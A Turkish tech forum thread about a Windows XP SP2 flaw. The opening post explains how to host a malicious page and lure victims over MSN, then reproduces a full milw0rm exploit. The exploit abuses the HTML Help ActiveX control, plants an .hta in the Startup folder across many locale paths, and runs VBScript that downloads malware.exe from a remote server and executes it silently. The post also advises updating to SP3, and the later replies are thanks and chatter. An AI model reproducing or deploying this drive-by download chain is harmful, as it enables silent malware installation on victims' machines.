Xp Sp2 Kullananlar ?

surmelim37

Profesör
Katılım
12 Şubat 2009
Mesajlar
1,133
Reaksiyon puanı
8
Puanları
0
Xp sp2'nin bu güvenlik zaafı ile sp2 kullananlara aşahıda belirttiğim kodlar sayesinde pcnizde exe çalıştıralabiliyor bu nasıl bir tehditmi ?
örnek : Şimdi aşahıdaki kodlarda "http://server/malware.exe" bu kısımı editleyerek adamınsitesi.com/trojan.exe bunu yazar ve .html yapıp hostuna atar msnden size arkadaşım bakarmısın script nasıl gibisinden linki atar ve siz linke tıkladığınızda adamın çalıştırmak istediği exe pcnizde otomatik olarak çalışır sizden bir onay almadan yani :) trojan'ı bilirsiniz ama bilmeyenler için kısaca bahsedeyim trojanı yediğiniz anda klavyeye bastığınız hertuş karşı tarafa gider loglanır karşıdaki şahıs sizin bilgisayarınızdan istediği dosyayı sizin ruhunuz duymadan kendine alır veya size gönderir tüm şifreleriniz karşı tarafın eline geçer web camınızı izler vs vs neler neler :) peki bunu nasılmı önleyebilirsiniz sp3 yükleyerek bunun önüne geçebilirsiniz.
Not: Güvenmediğiniz kişilerin yolladığı linklere tıklamayınız haberiniz olmadan n

# Surmelim37
----------------------------
// sp2rc.htm //

<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\
PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>

<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:
execScript("document.write(\"<script language=\\\"vbscript\\\"
src=\\\"http://site/writehta.txt\\\"\"+String.fromCharCode(62)+\"
</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>

// writehta.txt //

Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://server;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
// Spanish \Documents and Settings\All Users\Menu Inicio\Programas\Inicio\
// French \Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage
// Danish \Documents and Settings\All Users\Menuen Start\Programmer\Start\
// Dutch \Documents and Settings\All Users\Menu Start\Programma's\Opstarten\
// Polish \Documents and Settings\All Users\Menu Start\Programy\Autostart\
// Italian \Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\
// Finn \Documents and Settings\All Users\Kaynnista-valikko\Ohjelmat\Kaynnistys\
// Turkish \Documents and Settings\All Users\Start Menu\Programlar\BASLANGIC\ Turkish
// Norwegian \Documents and Settings\All Users\Start-meny\Programmer\Oppstart\
// Swedish \Documents and Settings\All Users\Start-menyn\Program\Autostart\
// Portuguese \Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\
// German \Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\
rs.close
conn.close
window.close

// f00bar.txt //

"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://server/malware.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""</script> crap="""
//milw0rm.com
 

Pupilla

Dekan
Katılım
17 Haziran 2009
Mesajlar
8,724
Reaksiyon puanı
139
Puanları
243
faydalı bir bilgi sağol. heralde herkes windows 7ye geçti. xpye artık ilgi gösteren az.
 

surmelim37

Profesör
Katılım
12 Şubat 2009
Mesajlar
1,133
Reaksiyon puanı
8
Puanları
0
Aynen fakat nekadar windows 7 çıksada 8de yolda olsada xp aşkı olanlarda çok onun için konu açayım dedim yorumun için teşekkürler.
 

kavrak

Profesör
Katılım
11 Mayıs 2009
Mesajlar
1,315
Reaksiyon puanı
12
Puanları
0
bilgi için teşekkürler
 

teknomod

Asistan
Katılım
19 Aralık 2009
Mesajlar
383
Reaksiyon puanı
1
Puanları
0
sp10 da olsa windowsta her zaman güvenlik açığı olacaktır.
 

POWER

Rektör
Katılım
5 Ekim 2009
Mesajlar
10,275
Reaksiyon puanı
161
Puanları
0
WinXp Sp2 öldü. WinXP Sp3 ün son 2 yılı. Sonra unutun artık WinXP yi.
 

0ReiS0

Dekan
Katılım
8 Temmuz 2008
Mesajlar
5,666
Reaksiyon puanı
91
Puanları
228
Ben Kullanıyorum Öle bi Sorunum Korkum yok :)
 

attorney

Doçent
Katılım
1 Ocak 2010
Mesajlar
524
Reaksiyon puanı
18
Puanları
0
windows 7 kullanıyorum yinede bilgi için teşekkürler
 

black_sea_28

Asistan
Katılım
16 Haziran 2008
Mesajlar
140
Reaksiyon puanı
26
Puanları
28
böyle durumda antivirüs programları işe yaramayacak mı ?
 

NecronomicoN

Profesör
Katılım
30 Temmuz 2007
Mesajlar
2,765
Reaksiyon puanı
12
Puanları
218
kullandığınız yazılım yada işletim sisteminden ne kadar memnun olursanız olun son çıkan güncelleştirmeleri yüklemek şart. adobe'u bile güncellemek hayati önem taşıyo çoğu zaman.
 

by efsane

Rektör
Emektar
Katılım
10 Aralık 2008
Mesajlar
14,680
Reaksiyon puanı
2,135
Puanları
293
valla ben de xp sp2 kullanıyorum bunu yapmam için bazı hocalarımdan bilgi almam lazım :) ama paylaşım için sağol
 

brskyk

Doçent
Katılım
30 Eylül 2008
Mesajlar
842
Reaksiyon puanı
4
Puanları
18
Xp yi unutturanlar utansın :D:D:D
 

tolgacakiroglu

Asistan
Katılım
16 Nisan 2009
Mesajlar
312
Reaksiyon puanı
3
Puanları
0
Ilk olarak Firefox kullananlar icin sorun yok. Cunku Firefox'ta ActiveX'ler calismiyor. Ikinci olarakta bugun deli etti beni o activex'in calismamasi. IE8'te, sertifikasi yok diye kendi yaptigim activex'i calistirmadi. Gicik SP3.
 
Üst